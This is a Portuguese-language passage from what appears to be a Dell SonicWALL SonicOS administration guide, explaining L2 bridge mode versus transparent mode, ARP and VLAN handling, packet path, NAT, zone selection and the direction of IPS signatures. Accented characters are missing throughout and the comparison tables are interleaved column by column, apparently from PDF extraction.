LAN, WLAN, DMZ ou zonas personalizadas. Esse recurso
permite que clientes sem fio e com fio compartilhem
diretamente os mesmos recursos de rede, incluindo endereos
DHCP. O protocolo de camada 2 pode ser executado entre
interfaces emparelhadas, permitindo que vrios tipos de
trfego passem a ponte, incluindo pacotes de difuso e no ip.
Conceitos principais para configurar o modo de ponte L2 e o modo transparente

Os termos a seguir sero usados para se referir operao e configurao do modo de ponte
L2:
Modo de ponte L2 um mtodo de configurao de um dispositivo de segurana Dell
SonicWALL que permite que o firewall seja embutido em uma rede existente com
transparncia absoluta, mesmo alm daquele fornecido pelo Modo transparente. O Modo
de ponte de camada 2 refere-se tambm configurao de Atribuio de IP que
selecionada para Interfaces de ponte secundrias que so colocadas em um Par de ponte.
Modo transparente um mtodo de configurao de um dispositivo de segurana Dell
SonicWALL que permite que o firewall seja inserido em uma rede existente sem a
necessidade de reconfigurao de IP, abrangendo uma nica sub-rede IP em duas ou mais
interfaces atravs do uso de ARP automaticamente aplicado e lgica de roteamento.
Atribuio de IP ao configurar uma interface Confivel (LAN) ou Pblica (DMZ), a
atribuio de IP para a interface pode ser:
Esttico o endereo IP da interface inserido manualmente.

Modo transparente o endereo IP da interface atribudo usando um Objeto de
endereo (Host, Intervalo ou Grupo) que esteja dentro da sub-rede IP primria de
WAN, abrangendo efetivamente a sub-rede da interface de WAN para a interface
atribuda.
Modo de ponte de camada 2 uma interface colocada nesse modo torna-se a
Interface de ponte secundria para a Interface de ponte primria com a qual est
emparelhada. O par de ponte resultante comporta-se ento como uma ponte de
aprendizado de duas portas com transparncia L2 completa e todo o trfego IP que
transmitido estar sujeito a failover estvel completo e inspeo profunda de pacotes.
Par de ponte o conjunto de interface lgica composto por uma Interface de ponte
primria e uma Interface de ponte secundria. Os termos primrio e secundrio no
implicam qualquer nvel inerente de domnio ou subordinao operacional; as duas
interfaces continuam sendo tratadas de acordo com seu tipo de zona e transmitindo trfego
IP de acordo com suas regras de acesso configuradas. O trfego no IPv4 no par de ponte
controlado pela configurao Bloquear todo o trfego no IPv4 na Interface de ponte
secundria. Um sistema pode suportar tantos pares de ponte quantos os pares de interface
disponveis. Por outras palavras, o nmero mximo de pares de ponte igual a do
nmero de interfaces fsicas na plataforma. A participao em um par de ponte no impede
uma interface de comportamento convencional. Por exemplo, se X1 for configurada como
uma Interface de ponte primria emparelhada com X3 como uma Interface de ponte
secundria, X1 pode operar simultaneamente em sua funo tradicional como a WAN
primria, executando a NAT para trfego de Internet por meio da Poltica de NAT padro
de X1 adicionada automaticamente.
Interface de ponte primria uma designao que atribuda a uma interface assim que
uma Interface de ponte secundria for emparelhada com ela. Uma Interface de ponte
primria pode pertencer a uma zona No confivel (WAN), Confivel (LAN) ou Pblica
(DMZ).
Interface de ponte secundria uma designao que atribuda a uma interface cuja
Atribuio de IP foi configurada para o Modo de ponte de camada 2. Uma Interface de
ponte secundria pode pertencer a uma zona Confivel (LAN) ou Pblica (DMZ).
Endereo de gerenciamento de ponte o endereo da interface de ponte primria
compartilhado pelas duas interfaces do Par de ponte. Se a Interface de ponte primria
tambm for a Interface de WAN primria, esse endereo que usado para comunicaes
de sada pelo firewall, como atualizaes de NTP e Gerenciador de licenas. Os hosts que
esto conectados a qualquer segmento do par de ponte tambm podem usar o endereo
de gerenciamento de ponte como gateway, pois ser comum nas implantaes de Modo
misto.
Parceiro de ponte o termo usado para se referir a "outro" membro de um Par de ponte.
Trfego no IPv4 o SonicOS suporta os seguintes tipos de protocolo IP: ICMP (1), IGMP
(2), TCP (6), UDP (17), GRE (47), ESP (50), AH (51), EIGRP (88), OSPF (89), PIM-SM
(103), L2TP (115). Os tipos IP mais complexos, como Combat Radio Transport Protocol
(126), no so tratados nativamente pelo firewall nem so tipos de trfego no IPv4, como
IPX ou (atualmente) IPv6. O modo de ponte L2 pode ser configurado para transmitir ou
descartar o trfego no IPv4.
Modo de ponte cativa esse modo opcional de operao de ponte L2 impede que o
trfego que entrou em uma ponte L2 seja encaminhado para uma interface de no par
ponte. Por padro, a lgica de ponte L2 encaminhar o trfego que entrou na ponte L2 para
seu destino ao longo do caminho ideal, conforme determinado pelo ARP e pelas tabelas
de roteamento. Em alguns casos, o caminho ideal pode envolver roteamento ou
recebimento de NAT para uma interface de no par de ponte. A ativao do modo de ponte
cativa garante que o trfego que entra em uma ponte L2 sai da ponte L2 em vez de assumir

seu caminho ideal de forma lgica. Em geral, esse modo de operao s necessrio em
redes complexas com caminhos redundantes, onde necessria a conformidade estrita
com o caminho.
Topologia de ponte L2 pura refere-se a implantaes onde o firewall ser usado
estritamente no Modo de ponte L2 para fins de fornecimento de segurana embutida em
uma rede. Isso significa que todo o trfego que entra em um lado do Par de ponte estar
vinculado ao outro lado e no ser roteado/no receber NAT por meio de uma interface
diferente. Isso ser comum em casos em que h um dispositivo de segurana de permetro
existente ou em que desejada segurana embutida ao longo de algum caminho (por
exemplo, entre departamentos ou em um link truncado entre dois switches) de uma rede
existente. A topologia de ponte L2 pura no uma limitao funcional, mas em vez disso
uma descrio topolgica de uma implantao comum em ambientes heterogneos.
Topologia de modo misto refere-se a implantaes onde o Par de ponte no ser o
nico ponto de ingresso/egresso atravs do firewall. Isso significa que o trfego que entra
em um lado do Par de ponte poder destinar-se a ser roteado/receber NAT por meio de
uma interface diferente. Isso ser comum quando o firewall for usado simultaneamente
para fornecer segurana para um ou mais pares de ponte enquanto tambm fornece:
Segurana do permetro, como conectividade WAN, para hosts no par de ponte ou em
outras interfaces.
Servios de firewall e segurana para segmentos adicionais, como interface Confivel
(LAN) ou Pblica (DMZ), onde as comunicaes ocorrero entre hosts nesses
segmentos e hosts no par de ponte.
Servios sem fio com SonicPoints, onde as comunicaes ocorrero entre clientes sem
fio e os hosts no par de ponte.
Comparar o modo de ponte L2 com o modo transparente

Esta comparao de modo de ponte L2 e modo transparente contm as sees a seguir:
ARP no modo transparente na pgina 224
Suporte de VLAN no modo transparente na pgina 224
Vrias sub-redes no modo transparente na pgina 224
Trfego no IPv4 no modo transparente na pgina 224
ARP no modo de ponte L2 na pgina 224
ARP no modo de ponte L2 na pgina 224
Suporte de VLAN no modo de ponte L2 na pgina 225
Caminho de pacotes IP de ponte L2 na pgina 226
Vrias sub-redes no modo de ponte L2 na pgina 227
Trfego no IPv4 no modo de ponte L2 na pgina 228
Comparao de modo de ponte L2 com o modo transparente na pgina 229
Benefcios do modo transparente comparativamente ao modo de ponte L2 na pgina 230
Enquanto o Modo transparente permite que um dispositivo de segurana executando o
SonicOS seja introduzido em uma rede existente sem a necessidade de novo endereamento,
ele apresenta um certo nvel de quebra, especialmente em relao a ARP, suporte de VLAN,
vrias sub-redes e tipos de trfego no IPv4. Considere o diagrama abaixo, em uma situao
em que um dispositivo SonicWALL de Modo transparente acabou de ser adicionado rede com
o objetivo de integrao com o mnimo de interrupes, em particular o seguinte:
Tempo de inatividade insignificante ou no agendado
Sem necessidade de novo endereamento de qualquer parte da rede
Sem necessidade de reconfigurao ou, de outra forma, modificao do roteador do
gateway (como comum quando o roteador de propriedade do IPS)

ARP no modo transparente
ARP Protocolo de resoluo de endereo (o mecanismo pelo qual endereos de hardware

exclusivos nas placas de interface de rede esto associados a endereos IP) aplicado com
proxy no Modo transparente. Se a estao de trabalho no servidor esquerda resolveu
anteriormente o Roteador (192.168.0.1) para seu endereo MAC 00:99:10:10:10:10, essa
entrada de ARP em cache precisaria ser excluda antes que esses hosts conseguissem
comunicar atravs do firewall. Isso ocorre porque o firewall aplica proxies (ou respostas em
nome de) ao IP do gateway (192.168.0.1) para hosts conectados a interfaces operando no
Modo transparente. Por isso, quando a estao de trabalho esquerda tenta resolver
192.168.0.1, a solicitao do ARP que envia respondida pelo firewall com seu prprio
endereo MAC X0 (00:06:B1:10:10:10).
O firewall tambm aplica proxy aos ARPs dos endereos IP especificados no Intervalo
transparente (192.168.0.100 a 192.168.0.250) atribudo a uma interface no Modo transparente
para solicitaes de ARP recebidas na interface X1 (WAN primria). Se o Roteador resolveu
anteriormente o Servidor (192.168.0.100) para seu endereo MAC 00:AA:BB:CC:DD:EE, essa
entrada de ARP em cache precisaria ser excluda antes que o roteador conseguisse comunicar
com o host atravs do firewall. Isso geralmente requer uma liberao de cache de ARP do
roteador a partir de sua interface de gerenciamento ou atravs de reinicializao. Depois de a
cache de ARP do roteador ser excluda, possvel enviar uma nova solicitao de ARP para
192.168.0.100, qual o firewall responder com o seu endereo MAC X1 00:06:B1:10:10:11.
Suporte de VLAN no modo transparente
Embora a rede mostrada no diagrama acima seja simples, no incomum para redes maiores
usar VLANs para segmentao de trfego. Se esta fosse esse tipo de rede, onde o link entre
o switch e o roteador era um tronco de VLAN, um SonicWALL de modo transparente teria sido
capaz de encerrar as VLANs para subinterfaces em ambos os lados do link, mas isso exigiria
o endereamento exclusivo, isto , seria necessrio novo endereamento em, pelo menos, um
lado da operao de no modo transparente. Isso ocorre porque apenas a interface de WAN
primria pode ser usada como a origem do espao de endereo do modo transparente.
Vrias sub-redes no modo transparente
Tambm comum para redes maiores empregar vrias sub-redes, sejam elas em um nico
cabo, em VLANs separadas, cabos mltiplos ou alguma combinao. Enquanto o Modo
transparente capaz de suportar vrias sub-redes com o uso de entradas de Rota e ARP
esttico, como a nota tcnica http://www.sonicwall.com/us/support/2134_3468.html descreve,
no um processo sem esforo.
Trfego no IPv4 no modo transparente
O modo transparente descartar (e, geralmente, registrar) todo o trfego no IPv4, evitando
que passe outros tipos de trfego, como IPX ou tipos IP no tratados.
O modo de ponte L2 trata esses problemas comuns de implantao de Modo transparente, os
quais esto descritos na seo a seguir.
ARP no modo de ponte L2
O Modo de ponte L2 usa um design de ponte de aprendizado, determinando dinamicamente

que hosts se encontram em uma interface especfica de uma ponte L2 (designados como Par
de ponte). O ARP passa de forma nativa, o que significa que um host que comunica em uma
ponte L2 ver os endereos MAC de host reais de seus pares. Por exemplo, a estao de
trabalho que comunica com o roteador (192.168.0.1) ver o roteador como 00:99:10:10:10:10
e o roteador ver a estao de trabalho (192.168.0.100) como 00:AA:BB:CC:DD:EE.

Esse comportamento permite que um SonicWALL operando no Modo de ponte L2 seja
introduzido em uma rede existente sem interromper a maioria das comunicaes de rede que
no aquelas causadas pela descontinuidade momentnea da insero fsica.
Observe que as comunicaes de protocolos TCP com base em fluxo (por exemplo, uma
sesso FTP entre um cliente e um servidor) precisaro ser restabelecidas aps a insero de
um firewall de Modo de ponte L2. Isto se deve ao design, para manter a segurana
proporcionada pela inspeo de pacotes estvel (SPI). Uma vez que o mecanismo de SPI no
pode ter conhecimento das conexes TCP que existiam previamente, ele descartar esses
pacotes estabelecidos com um evento de log, como Pacote TCP recebido em conexo no
existente/fechada; Pacote TCP descartado.
Suporte de VLAN no modo de ponte L2
Em dispositivos de segurana Dell SonicWALL, o modo de ponte L2 oferece controle detalhado

do trfego de VLAN 802.1Q atravessando uma ponte L2. O tratamento padro de VLANs
permitir e preservar todas as marcas de VLAN 802.1Q medida que passam por uma ponte
L2, aplicando ainda todas as regras de firewall e inspeo estvel e profunda de pacotes ao
trfego encapsulado. ainda possvel especificar listas brancas/negras para IDs de VLAN
permitidos/no permitidos atravs da ponte L2.
Isso permite que um SonicWALL operando no modo de ponte L2 seja inserido, por exemplo,
de forma embutida em um tronco de VLAN com qualquer nmero de VLANs e fornea servios
de segurana completos para todo o trfego IPv4 passando a VLAN sem a necessidade de
configurao explcita de qualquer ID de VLAN ou sub-rede. As regras de acesso do firewall
tambm podem, opcionalmente, ser aplicadas a todo o trfego VLAN que passa atravs do
modo de ponte L2 devido ao mtodo de tratamento do trfego de VLAN.

Caminho de pacotes IP de ponte L2
A seguinte sequncia de eventos descreve o diagrama de fluxo acima:

1. O quadro encapsulado 802.1Q entra em uma interface de ponte L2 (essa primeira, a
prxima etapa e a etapa final se aplicam somente ao trfego de VLAN 802.1Q).
2. O ID de VLAN 802.1Q verificado em relao lista branca/negra de IDs de VLAN:
Se o ID de VLAN no for permitido, o pacote ser descartado e registrado.
Se o ID de VLAN for permitido, o pacote ser desencapsulado, o ID de VLAN ser
armazenado e o pacote interno (incluindo o cabealho IP) ser transmitido atravs do
manipulador de pacotes completos.
3. Uma vez que qualquer nmero de sub-redes suportado por ponte L2, no realizada
qualquer verificao de falsificao de IP de origem no IP de origem do pacote. possvel
configurar pontes L2 para oferecer suporte apenas a uma determinada sub-rede ou sub-
redes usando Regras de acesso do firewall.
4. realizao a verificao de inundao SYN.
5. Uma pesquisa de rota de destino executada para a zona de destino, para que a regra de
acesso do firewall apropriada possa ser aplicada. Qualquer zona um destino vlido,
incluindo a mesma zona que a zona de origem (por exemplo, LAN para LAN), a zona no
confivel (WAN), a zona criptografada (VPN), a zona sem fio (WLAN), a zona de difuso
seletiva ou zonas personalizadas de qualquer tipo.

6. Uma pesquisa de NAT executada e aplicada, conforme necessrio.
Em geral, o destino de pacotes que entram em uma ponte L2 ser a interface Parceiro
de ponte (ou seja, o outro lado da ponte). Nesses casos, nenhuma converso ser
executada.
Em casos em que o endereo de gerenciamento de ponte L2 o gateway, como por
vezes ser o caso em topologias de modo misto, a NAT ser aplicada conforme
necessrio (consulte a seo Determinao de caminho de ponte L2 para obter mais
detalhes).
7. As regras de acesso do firewall so aplicadas ao pacote. Por exemplo, em dispositivos de
segurana Dell SonicWALL, a seguinte decodificao de pacote mostra um pacote ICMP
com ID 10 de VLAN, endereo IP de origem 110.110.110.110 destinado ao endereo IP
4.2.2.1.
possvel criar uma regra de acesso do firewall para controlar qualquer pacote IP,
independente de sua associao VLAN, por qualquer um dos seus elementos IP, como IP
de origem, IP de destino ou tipo de servio. Se o pacote no for permitido, ele ser
descartado e conectado. Se o pacote for permitido, ele continuar.
8. realizada uma entrada em cache de conexo para o pacote e as converses de NAT
necessrias (se existirem) so executadas.
9. As transformaes e a inspeo de pacotes estvel so executadas para TCP, VoIP, FTP,
MSN, Oracle, RTSP e outros fluxos de mdia, PPTP e L2TP. Se o pacote no for permitido,
ele ser descartado e conectado. Se o pacote for permitido, ele continuar.
10. A inspeo profunda de pacotes, incluindo GAV, IPS, Anti-spyware, CFS e filtragem de e-
mail, executada. Se o pacote no for permitido, ele ser descartado e conectado. Se o
pacote for permitido, ele continuar. A notificao de cliente ser executada conforme
configurado.
11. Se o pacote se destinar zona criptografada (VPN), zona no confivel (WAN) ou a outra
interface conectada (poder ser o caso das ltimas duas em topologias de modo misto), o
pacote ser enviado por meio do caminho apropriado.
12. Se o pacote no se destinar interface VPN/WAN/Conectada, a marca VLAN armazenada
ser restaurada e o pacote (novamente com a marca VLAN original) ser enviado para a
interface Parceiro de ponte.
Vrias sub-redes no modo de ponte L2
O modo de ponte L2 capaz de lidar com qualquer nmero de sub-redes atravs da ponte,
conforme descrito acima. O comportamento padro permitir que todas as sub-redes, exceto
regras de acesso, possam ser aplicadas para controlar o trfego, conforme necessrio.

Trfego no IPv4 no modo de ponte L2
O trfego no suportado ser, por padro, passado de uma interface de ponte L2 para a
interface de parceiro de ponte. Isso permite que o firewall passe outros tipos de trfego,
incluindo pacotes LLC como rvore de extenso, outros tipos ether, como pacotes comutados
de rtulo MPLS (tipo ether 0x8847), Appletalk (tipo ether 0x809b) e os sempre populares
Banyan Vines (tipo ether 0xbad). Esses pacotes no IPv4 s sero passados na ponte, eles
no sero inspecionados ou controlados pelo manipulador de pacotes. Se esses tipos de
trfego no forem necessrias ou desejados, o comportamento de ponte pode ser alterado
habilitando a opo Bloquear todo o trfego no IPv4 na pgina de configurao Interface
de ponte secundria.

Comparao de modo de ponte L2 com o modo transparente
Atributo Modo de ponte de camada 2 Modo transparente

Camada de operao Camada 2 (MAC) Camada 3 (IP)
Comportamento de ARP As informaes de ARP (Protocolo de resoluo aplicado proxy a ARP pelas interfaces
de endereo) esto inalteradas. Os endereos operando no modo transparente.
MAC atravessam nativamente a ponte L2. Os
pacotes que so destinados a endereos MAC da
SonicWALL sero processados, outros sero
passados e os de origem e de destino sero
aprendidos e armazenados em cache.
Definio de caminho Os hosts em ambos os lados de um par de ponte A interface de WAN primria sempre o ponto
so dinamicamente aprendidos. No h de ingresso/egresso mestre para o trfego do
necessidade de declarar afinidades de interface. modo transparente e para a determinao de
espao de sub-rede. Os hosts que compartilham
de forma transparente esse espao de sub-rede
devem ser declarados explicitamente atravs do
uso de atribuies de objeto de endereo.
Interfaces mximas Duas interfaces, uma interface de ponte primria e Duas ou mais interfaces. A interface mestre
uma interface de ponte secundria. sempre a WAN primria. Podem existir tantas
interfaces subordinadas transparentes quantas
interfaces disponveis.
Emparelhamentos mximos O nmero mximo de pares de ponte permitido O modo transparente permite apenas que a sub-
limitado apenas pelas interfaces fsicas rede de WAN primria seja estendida a outras
disponveis. Isso pode ser descrito como "muitos interfaces, embora permita que vrias interfaces
emparelhamentos de um para um". operem simultaneamente como parceiros
transparentes para a WAN primria. Isso pode
ser descrito como "um nico emparelhamento
um para um" ou "um nico emparelhamento um
para muitos".
Restries de zona A interface de ponte primria pode ser No As interfaces em um par de modo transparente
confivel, Confivel ou Pblica. A interface de devem consistir em uma interface no confivel
ponte secundria pode ser Confivel ou Pblica. (a WAN primria, como o mestre da sub-rede do
par) e uma ou mais interfaces confiveis/pblicas
(por exemplo, LAN ou DMZ).
Sub-redes suportadas Qualquer nmero de sub-redes suportado. As Na sua configurao padro, o modo
regras de acesso do firewall podem ser gravadas transparente suporta apenas uma nica sub-rede
para controlar o trfego de/para qualquer uma das (que est atribuda a e estendida da WAN
sub-redes, conforme necessrio. primria). possvel adicionar manualmente
suporte para sub-redes adicionais atravs do uso
de entradas e rotas de ARP.
Trfego no IPv4 Todo o trfego no IPv4, por padro, ligado com O trfego no IPv4 no tratado pelo modo
ponte de uma interface de par de ponte interface transparente e descartado e conectado.
de parceiro de ponte, a menos que desabilitado na
pgina de configurao Interface de ponte
secundria. Isso inclui trfego IPv6, STP
(Protocolo de rvore de extenso) e tipos IP no
reconhecidos.
Trfego de VLAN O trfego de VLAN passado pela ponte L2 e As subinterfaces de VLAN podem ser criadas e
totalmente inspecionado pelos mecanismos de podem ser fornecidas com atribuies de objeto
inspeo estvel e profunda de pacotes. de endereo de modo transparente, mas as
VLANs sero encerradas pelo firewall, em vez de
serem passadas.

Subinterfaces de VLAN As subinterfaces de VLAN podem ser As subinterfaces de VLAN podem ser atribudas
configuradas em interfaces de par de ponte, mas a interfaces fsicas operando no modo
elas passaro pela ponte para o parceiro de transparente, mas seu modo de operao ser
ponte, a menos que o endereo IP de destino no independente de seu pai. Essas subinterfaces de
quadro de VLAN coincida com o endereo IP da VLAN tambm podem ser fornecidas com
subinterface de VLAN no firewall. Em qualquer um atribuies de objeto de endereo de modo
dos casos elas sero processadas (por exemplo, transparente, mas as subinterfaces de VLAN em
como trfego de gerenciamento). nenhum caso sero encerradas em vez de
serem passadas.
Endereamento dinmico Embora uma interface de ponte primria possa ser Apesar de o modo transparente empregar a
atribuda zona de WAN, somente o WAN primria como uma interface mestre,
endereamento esttico permitido para somente o endereamento esttico permitido
interfaces de ponte primria. para o modo transparente.
Suporte de VPN A operao de VPN suportada com uma rota A operao de VPN suportada sem requisitos
adicional configurada. Consulte Integrao de especiais de configurao.
VPN com o modo de ponte de camada 2 na
pgina 248 para obter detalhes.
Suporte de DHCP O DHCP pode ser transmitido por meio de um par As interfaces operando no modo transparente
de ponte. podem fornecer servios DHCP ou podem
transmitir DHCP usando um Auxiliar de IP.
Roteamento e NAT A entrada/sada de trfego sero inteligentemente O trfego ser roteado de forma inteligente de/
roteadas do par de ponte L2 de/para outros para outros caminhos. Por padro, o trfego no
caminhos. Por padro, o trfego no receber receber NAT de/para a WAN para/da interface
NAT de uma interface de par de ponte para o de modo transparente, mas pode receber NAT
parceiro de ponte, mas pode receber NAT para para outros caminhos, conforme necessrio. As
outros caminhos, conforme necessrio. As rotas rotas personalizadas e as polticas de NAT
personalizadas e as polticas de NAT podem ser podem ser adicionadas conforme necessrio.
adicionadas conforme necessrio.
Inspeo de pacotes A inspeo de pacotes estvel completa ser A inspeo de pacotes estvel completa ser
estvel aplicada a todo o trfego IPv4 passando a ponte aplicada ao trfego de/para as sub-redes
L2 para todas as sub-redes, incluindo trfego definidas por atribuio de objeto de endereo de
VLAN em firewalls. modo transparente.
Servios de segurana Todos os servios de segurana (GAV, IPS, Anti- Todos os servios de segurana (GAV, IPS, Anti-
Spy, CFS) so totalmente suportados. Todo o Spy, CFS) so totalmente suportados de/para as
trfego regular de IP, bem como todo o trfego de sub-redes definidas por atribuio de objeto de
VLAN encapsulado 802.1Q. endereo de modo transparente.
Trfego de difuso O trfego de difuso passado da interface do par O trfego de difuso descartado e conectado,
de ponte de recebimento para a interface de com a possvel exceo de NetBIOS que pode
parceiro de ponte. ser tratado por um Auxiliar de IP.
Trfego de difuso seletiva O trfego de difuso seletiva inspecionado e O trfego de difuso seletiva, com dependncia
transmitido atravs de pares de ponte L2 se a de IGMP, inspecionado e passado pelo modo
difuso seletiva tiver sido habilitada na pgina transparente se a difuso seletiva tiver sido
Firewall > Difuso seletiva. No dependente do ativada na pgina Firewall > Difuso seletiva e o
sistema de mensagens IGMP nem necessrio suporte de difuso seletiva tiver sido habilitado
habilitar o suporte de difuso seletiva nas nas interfaces relevantes.
interfaces individuais.
Benefcios do modo transparente comparativamente ao modo de ponte L2
As duas interfaces so o mximo permitido em um par de ponte L2. Se forem necessrias mais
de duas interfaces para operar na mesma sub-rede, o modo transparente dever ser
considerado.

Determinao de caminho de ponte L2
Os pacotes recebidos pelo firewall em interfaces de par de ponte devem ser encaminhados ao
longo do caminho ideal e apropriado para o seu destino, quer esse caminho seja o parceiro de
ponte, outra interface ou subinterface fsica ou um tnel de VPN. Da mesma forma, os pacotes
que chegam de outros caminhos (fsicos, virtuais ou VPN) associados a um host em um par de
ponte devem ser enviados pela interface de par de ponte correta. O resumo a seguir descreve,
por ordem, a lgica que aplicada a determinaes de caminho para esses casos:
1. Se estiver presente, a rota no padro mais especfica para o destino escolhida. Isso
abrangeria, por exemplo:
a. Um pacote que chega em X3 (LAN de ponte no L2) destinado sub-rede de host
15.1.1.100, onde existe uma rota para a sub-rede 15.1.1.0/24 por meio de
192.168.0.254 via interface X0 (interface de ponte secundria, LAN). O pacote deveria
ser encaminhado via X0 para o endereo MAC de destino de 192.168.0.254, com o
endereo IP de destino 15.1.1.100.
b. Um pacote que chega em X4 (interface de ponte primria, LAN) destinado ao host
10.0.1.100, onde existe uma rota para 10.0.1.0/24 por meio de 192.168.10.50 via
interface X5 (DMZ). O pacote deveria ser encaminhado via X5 para o endereo MAC
de destino de 192.168.10.50, com o endereo IP de destino 10.0.1.100.
2. Se no existir uma rota especfica para o destino, ser executada uma pesquisa de cache
de ARP para o endereo IP de destino. Uma correspondncia indicar a interface de
destino apropriada. Isso abrangeria, por exemplo:
a. Um pacote que chega em X3 (LAN de ponte no L2) destinado ao host 192.168.0.100
(que reside na interface X2 de ponte primria L2). O pacote deveria ser encaminhado
via X2 para os endereos MAC e IP de destino conhecidos de 192.168.0.100, conforme
derivado do cache de ARP.
b. Um pacote que chega em X4 (interface de ponte primria, LAN) destinado ao host
10.0.1.10 (que reside em X5 DMZ). O pacote deveria ser encaminhado via X5 para
os endereos MAC e IP de destino conhecidos de 10.0.1.10, conforme derivado do
cache de ARP.
3. Se no for encontrada nenhuma entrada de ARP:
a. Se o pacote chegar em uma interface de par de ponte, ele enviado para a interface
de parceiro de ponte.
b. Se o pacote chegar de outro caminho, o firewall ir enviar uma solicitao de ARP para
as duas interfaces do par de ponte para determinar em qual segmento reside o IP de
destino.
Neste ltimo caso, uma vez que o destino desconhecido at ser recebida uma
resposta de ARP, a zona de destino tambm permanecer desconhecida at esse
momento. Isso impede que o firewall seja capaz de aplicar a regra de acesso
apropriada at a determinao de caminho estar concluda. Aps a concluso, a regra
de acesso correta ser aplicada ao trfego relacionado subsequente.
Com relao converso de endereos (NAT) de trfego que chega em uma interface de par
de ponte L2:
1. Se for determinada a associao interface de parceiro de ponte, no ser executada
nenhuma converso de IP (NAT).
2. Se for determinada a associao a um caminho diferente, sero aplicadas polticas de NAT
apropriadas:

a. Se o caminho for outra interface (local) conectada, provavelmente no ocorrer
nenhuma converso. Isto , ele ser efetivamente roteado como resultado do clique no
ltimo recurso Qualquer->Poltica de NAT original.
b. Se se determinar que o caminho atravs da WAN, ser aplicada a Poltica de NAT de
sada [interface] adicionada automaticamente para WAN X1 padro e a origem do
pacote ser convertida para entrega Internet. Isso comum no caso de topologias
de modo misto, conforme descrito em Segurana interna na pgina 236.
Seleo de zona de interface de ponte L2

A atribuio de zonas de interface de par de ponte deve ser realizada de acordo com os
requisitos de fluxo de trfego da sua rede. Ao contrrio do modo transparente, o qual impe
um sistema de "mais confivel para menos confivel", exigindo que a interface de origem seja
a WAN primria e a interface transparente seja Confivel ou Pblica, o modo de ponte L2
permite maior controle dos nveis operacionais de confiana. Especificamente, o modo de
ponte L2 permite que as Interfaces de ponte primria e secundria sejam atribudas s
mesmas zonas ou a zonas diferentes (por exemplo, LAN+LAN, LAN+DMZ, WAN+CustomLAN,
etc.). Isso afetar no apenas as Regras de acesso padro que so aplicadas ao trfego, mas
tambm a forma como os servios de segurana de inspeo profunda de pacotes so
aplicados no trfego que atravessa a ponte. As reas importantes a considerar ao escolher e
configurar interfaces para usar em um par de ponte so os Servios de segurana, as Regras
de acesso e a Conectividade de WAN:
Direcionalidade de servios de segurana
Como ser uma das admisses primrias do modo de ponte L2, compreender a aplicao de
servios de segurana importante para a seleo de zona apropriada para interfaces de par
de ponte. A aplicabilidade de servios de segurana baseia-se nos seguintes critrios:
1. A direo do servio:
GAV essencialmente um servio de entrada, inspecionando fluxos de entrada HTTP,
FTP, IMAP, SMTP, POP3 e TCP. Ele tambm possui um elemento de sada adicional
para SMTP.
O Anti-spyware essencialmente um servio de entrada, inspecionando HTTP, FTP,
IMAP, SMTP, POP3 de entrada para a entrega (ou seja, recuperao) de componentes
de spyware como geralmente reconhecido pelos respectivos IDs de classe. Ele
tambm possui um componente de sada adicional, onde a sada usada em relao
direcionalidade (nomeadamente, Sada) atribuda pelas assinaturas de IPS que
acionam o reconhecimento desses componentes de Spyware. O classificador de Sada
(descrito na tabela a seguir) usado porque esses componentes geralmente so
recuperados pelo cliente (por exemplo, host de LAN) via HTTP de um servidor Web na
Internet (host de WAN). Consultando a tabela abaixo, essa seria uma conexo de
Sada e requer uma assinatura com uma classificao direcional de Sada.
O IPS tem trs direes: Recebida, enviada e bidirecional. Recebida e Enviada so
descritas na tabela abaixo e Bidirecional refere-se a todos os pontos de interseo na
tabela.
Para preciso adicional, tambm so considerados outros elementos, como o estado
da conexo (por exemplo, SYN ou estabelecida) e a origem do pacote em relao ao
fluxo (por exemplo, iniciador ou respondente).
2. A direo do trfego. A direo do trfego relacionada IPS essencialmente
determinada pela zona de origem e de destino do fluxo de trfego. Quando um pacote
recebido pelo firewall, a sua zona de origem geralmente conhecida de imediato e a zona
de destino determinada rapidamente fazendo uma pesquisa de rota (ou VPN).

Com base na origem e no destino, a direcionalidade do pacote categorizada como
Recebida ou Enviada (no podem ser confundidas com Entrada e Sada), em que os
critrios a seguir so usados para a determinao:
Destino No Criptografa Difuso

Origem confivel Pblico Sem fio do Confivel seletiva
No Recebido Recebido Recebido Recebido Recebido Recebido
confivel
Pblico Enviado Enviado Enviado Recebido Recebido Recebido
Sem fio Enviado Enviado Confivel Confivel Confivel Recebido
Criptograf Enviado Enviado Confivel Confivel Confivel Enviado

ado
Confivel Enviado Enviado Confivel Confivel Confivel Enviado
Os dados da tabela esto sujeitos a alterao.

Alm dessa categorizao, os pacotes que viajam para/de zonas com nveis de confiana
adicional, os quais proporcionam inerentemente nveis avanados de segurana (LAN|
Sem fio|Criptografado<-->LAN|Sem fio|Criptografado), recebem a classificao especial
Confivel. O trfego com a classificao Confivel tem todas as assinaturas aplicadas
(Recebido, Enviado e Bidirecional).
3. A direo da assinatura. Isso se refere essencialmente ao IPS, onde cada assinatura
recebe uma direo pela equipe de desenvolvimento de assinatura da SonicWALL. Isso
feito como uma otimizao para minimizar falsos positivos. As direes de assinatura so:
Recebida aplica-se a Recebido e Confivel. A maioria das assinaturas so
Recebidas e incluem todas as formas de explorao de aplicativos e todas as
tentativas de enumerao e volume de memria. Aproximadamente 85% das
assinaturas so Recebidas.
Enviada aplica-se a Enviado e Confivel. Exemplos de assinaturas Enviadas
incluiriam tentativas de login de mensagens instantneas e P2P e respostas a
exploraes iniciadas com xito (por exemplo, respostas a ataques).
Aproximadamente 10% das assinaturas so Enviadas.
Bidirecional aplica-se a tudo. Exemplos de assinaturas Bidirecionais incluiriam
transferncias de arquivos de mensagens instantneas, vrios ataques de NetBIOS
(por exemplo, comunicaes Sasser) e uma variedade de ataques DoS (por exemplo,
trfego UDP/TCP destinado porta 0). Aproximadamente 5% das assinaturas so
Bidirecionais.
4. Aplicao de zona. Para que uma assinatura seja acionada, o servio de segurana
desejado deve estar ativo em pelo menos uma das zonas que atravessa. Por exemplo, um
host na Internet (X1, WAN) acessando um servidor de terminal da Microsoft (em X3,
interface de ponte secundria, LAN) acionar a assinatura Recebida "Alerta de deteco
de IPS: solicitao de servidor de terminal da MS MISC, SID: 436, prioridade: baixa" se o
IPS estiver ativo na WAN, na LAN ou em ambas.

Padres de regras de acesso
Regras de acesso de zona para zona padro. As regras de acesso padro devem ser
consideradas, embora elas possam ser modificadas conforme necessrio. Os padres so os
seguintes:
Conectividade de WAN
A conectividade com a Internet (WAN) necessria para comunicaes em pilha, como

licenciamento, downloads de assinaturas de servios de segurana, NTP (sincronizao de
hora) e CFS (Servios de filtragem de contedo). No momento, essas comunicaes s podem
ocorrer por meio da interface de WAN primria. Se voc precisar desses tipos de comunicao,
